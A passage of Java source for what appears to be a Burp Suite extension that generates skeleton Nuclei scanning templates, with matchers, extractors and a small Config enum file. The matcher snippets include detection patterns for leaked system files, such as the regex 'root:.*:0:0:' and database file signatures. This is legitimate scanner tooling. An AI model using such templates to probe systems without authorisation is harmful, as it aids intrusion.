algStrs = new ArrayList(); 783 | Config.ContentTypeMode[] backends = Config.ContentTypeMode.values(); 784 | for (Config.ContentTypeMode backend : backends) { 785 | algStrs.add(backend.name().replace('_', '/')); 786 | } 787 | return algStrs.toArray(new String[algStrs.size()]); 788 | } 789 | 790 | private String[] GetRedirectsModes() { 791 | ArrayList algStrs = new ArrayList(); 792 | Config.RedirectsMode[] backends = Config.RedirectsMode.values(); 793 | for (Config.RedirectsMode backend : backends) { 794 | algStrs.add(backend.name().replace('_', '/')); 795 | } 796 | return algStrs.toArray(new String[algStrs.size()]); 797 | } 798 | 799 | }); 800 | } 801 | 802 | 803 | @Override 804 | public void 
processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) { 805 | } 806 | 807 | @Override 808 | public String getTabCaption() { 809 | return "Nu_Te_Gen"; 810 | } 811 | 812 | @Override 813 | public Component getUiComponent() { 814 | return tabs; 815 | } 816 | 817 | private String Yaml_Gen(String TP_Id, String TP_Name, String TP_Author, String TP_Description, String TP_Tags, String TP_IsRedirect, String TP_Redirect_Num, String TP_Req, String TP_Path, String TP_Header, String TP_Body, String Tp_Severity) { 818 | String data = ""; 819 | 820 | //图省事,直接修改此处,硬编码metadata字段 821 | String id_info = "id: %s\n\n" + 822 | "info:\n" + 823 | " name: %s\n" + 824 | " author: %s\n" + 825 | " severity: %s\n" + 826 | " description: |\n" + 827 | " %s\n" + 828 | " metadata:\n" + 829 | " fofa-query: \n" + 830 | " shodan-query: \n" + 831 | " hunter-query: \n" + 832 | " reference:\n" + 833 | " - https://\n" + 834 | " tags: %s\n\n"; 835 | data += String.format(id_info, TP_Id, TP_Name, TP_Author, Tp_Severity, TP_Description, TP_Tags); 836 | 837 | String raw_requests = "http:\n" + 838 | " - raw:\n" + 839 | " - |\n" + 840 | " POST %s HTTP/1.1\n" + 841 | " Host: {{Hostname}}\n" + 842 | " Content-Type: %s\n" + 843 | "\n" + 844 | " %s\n\n"; 845 | 846 | String requests = "http:\n" + 847 | " - method: %s\n" + 848 | " path:\n" + 849 | " - \"{{BaseURL}}%s\"\n\n"; 850 | 851 | String Header = " headers:\n" + 852 | " Content-Type: %s\n\n"; 853 | 854 | String Body = " body: |\n" + 855 | " 替换此处注意每行缩进\n\n"; 856 | 857 | String redirects = " host-redirects: true\n" + 858 | " max-redirects: %s\n\n"; 859 | 860 | String Matchers = " matchers-condition: and\n" + 861 | " matchers:\n"; 862 | 863 | String MatchersWord = " - type: word\n" + 864 | " part: body\n" + 865 | " words:\n" + 866 | " - 'test1'\n" + 867 | " - 'test2'\n" + 868 | " condition: or\n\n"; 869 | 870 | String MatchersHeader = " - type: word\n" + 871 | " part: header\n" + 872 | " words:\n" + 873 | " - 'tomcat'\n\n"; 
874 | 875 | String MatchersStatus = " - type: status\n" + 876 | " status:\n" + 877 | " - 200\n\n"; 878 | 879 | String MatchersNegative = " - type: word\n" + 880 | " words:\n" + 881 | " - \"荣耀立方\"\n" + 882 | " - 'var model = \"LW-N605R\"'\n" + 883 | " part: body\n" + 884 | " negative: true\n" + 885 | " condition: or\n\n"; 886 | 887 | String MatchersTime = " - type: dsl\n" + 888 | " dsl:\n" + 889 | " - 'duration>=6'\n\n"; 890 | 891 | String MatchersSize = " - type: dsl\n" + 892 | " dsl:\n" + 893 | " - 'len(body)<130'\n\n"; 894 | 895 | String MatchersInteractsh_Protocol = " - type: word\n" + 896 | " part: interactsh_protocol # 配合 {{interactsh-url}} 关键词使用\n" + 897 | " words:\n" + 898 | " - \"http\"\n\n"; 899 | 900 | String MatchersInteractsh_Request = " - type: regex\n" + 901 | " part: interactsh_request # 配合 {{interactsh-url}} 关键词使用\n" + 902 | " regex:\n" + 903 | " - \"root:.*:0:0:\"\n\n"; 904 | 905 | String MatchersInteractsh_Regex = " - type: regex\n" + 906 | " regex:\n" + 907 | " - \"root:.*:0:0:\"\n" + 908 | " part: body\n\n"; 909 | 910 | String MatchersInteractsh_Binary = " - type: binary\n" + 911 | " binary:\n" + 912 | " - \"D0CF11E0\" # db\n" + 913 | " - \"53514C69746520\" # SQLite\n" + 914 | " part: body\n" + 915 | " condition: or\n\n"; 916 | 917 | String Extractors = " extractors:\n" + 918 | " - part: header\n" + 919 | " internal: true\n" + 920 | " group: 1\n" + 921 | " type: regex\n" + 922 | " regex:\n" + 923 | " - 'Set-Cookie: PHPSESSID=(.*); path=/'\n\n"; 924 | 925 | if (TP_Req == "RAW") { 926 | if (TP_Header == "urlencoded") { 927 | TP_Header = "application/x-www-form-urlencoded"; 928 | } else if (TP_Header == "json") { 929 | TP_Header = "application/json"; 930 | } 931 | 932 | if (TP_Body == "带") { 933 | TP_Body = "替换此处"; 934 | } else if (TP_Body == "不带") { 935 | TP_Body = ""; 936 | } 937 | 938 | data += String.format(raw_requests, TP_Path, TP_Header, TP_Body); 939 | } else { 940 | data += String.format(requests, TP_Req, TP_Path); 941 | if (TP_Header == 
"urlencoded") { 942 | data += String.format(Header, "application/x-www-form-urlencoded"); 943 | } else if (TP_Header == "json") { 944 | data += String.format(Header, "application/json"); 945 | } else if (TP_Header == "xml") { 946 | data += String.format(Header, "text/xml"); 947 | } 948 | 949 | if (!Objects.equals(TP_Body, "不带")) { 950 | data += String.format(Body, TP_Body); 951 | } 952 | } 953 | 954 | if (TP_IsRedirect == "istrue") { 955 | data += String.format(redirects, TP_Redirect_Num); 956 | } 957 | 958 | if (match_true) { 959 | data += Matchers; 960 | } 961 | if (match_word) { 962 | data += MatchersWord; 963 | } 964 | if (match_header) { 965 | data += MatchersHeader; 966 | } 967 | if (match_status) { 968 | data += MatchersStatus; 969 | } 970 | if (match_negative) { 971 | data += MatchersNegative; 972 | } 973 | if (match_time) { 974 | data += MatchersTime; 975 | } 976 | if (match_size) { 977 | data += MatchersSize; 978 | } 979 | if (match_interactsh_protocol) { 980 | data += MatchersInteractsh_Protocol; 981 | } 982 | if (match_interactsh_request) { 983 | data += MatchersInteractsh_Request; 984 | } 985 | if (match_regex) { 986 | data += MatchersInteractsh_Regex; 987 | } 988 | if (match_binary) { 989 | data += MatchersInteractsh_Binary; 990 | } 991 | 992 | if (extractors) { 993 | data += Extractors; 994 | } 995 | 996 | return data; 997 | 998 | } 999 | 1000 | } 1001 | -------------------------------------------------------------------------------- /src/main/java/burp/utils/Config.java: -------------------------------------------------------------------------------- 1 | package burp.utils; 2 | 3 | public class Config { 4 | 5 | public enum RedirectsMode { 6 | istrue, isfalse 7 | } 8 | 9 | public enum ContentTypeMode { 10 | 不使用,urlencoded, json,xml 11 | } 12 | 13 | public enum ContentBodyMode { 14 | 不带,带 15 | } 16 | 17 | public enum severityMode { 18 | info,low,medium,high,critical 19 | } 20 | 21 | public enum reqMode { 22 | GET,POST,RAW,PUT,OPTIONS,TRACE 23 | } 24 | 
25 | } 26 | --------------------------------------------------------------------------------